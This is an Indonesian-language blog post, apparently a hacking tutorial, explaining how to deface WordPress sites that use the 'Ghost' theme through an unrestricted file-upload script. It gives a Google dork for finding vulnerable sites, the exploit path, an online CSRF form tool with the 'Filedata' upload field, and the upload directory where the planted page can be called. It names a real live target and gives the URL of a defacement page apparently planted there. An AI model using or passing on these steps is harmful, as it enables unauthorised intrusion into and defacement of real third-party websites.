TUTORIAL DEFACE POC WP-THEME
assalamualaikum wr wb...kali ini saya akan memberikan tutorial cara deface poc wp-theme
dork : inurl:/Wp-content/themes/Ghost/
xploit : wp-content/themes/Ghost/includes/uploadify/upload_settings_image.php
pemanggil sc : wp-content/uploads/settingsimages/
csrf : https://earthseed.space/csrf.php
disini saya pakek live target ya biar gak panjang:v
live target : http://www.juvankoski.com/wp-content/themes/Ghost/plugins/
langsung aja ke caranya :
kalian dorking dulu di google, dan pilih target kalian
kalian buka target kalian
kalian tambahkan exploit di belakang website, contoh : http://webtarget.com/wp-content/themes/Ghost/includes/uploadify/upload_settings_image.php
lalu klick go/enter..
jika tampilannya eror seperti gambar di atas berarti VULN ya...
kalian masuk csrf online
di kolom URL kalian isi dengan target kalian : http://webtarget.com/wp-content/themes/Ghost/includes/uploadify/upload_settings_image.php
di kolom POST file kalian isi dengan Filedata
contoh
lalu kalian klick kunci senpai
kalian pilih choose file,document,cari script deface kalian yang berbentuk html
lalu kalian klick upload senpai
jika tampilannya seperti gambar di atas berarti script kalian sudah berhasi di apload...
sekarang kita panggil script deface dengan cara http:/webtarget.com/content/uploads/settingsimages/nama script.html
lalu klick go/enter
dan boom berhasil
hasil link : http://www.juvankoski.com/wp-content/uploads/settingsimages/lose.html
SELAMAT MENCOBA
ASSALAMUALAIKUM WR WB..
BYE
Wow the best lah mas ku😘😘
BalasHapus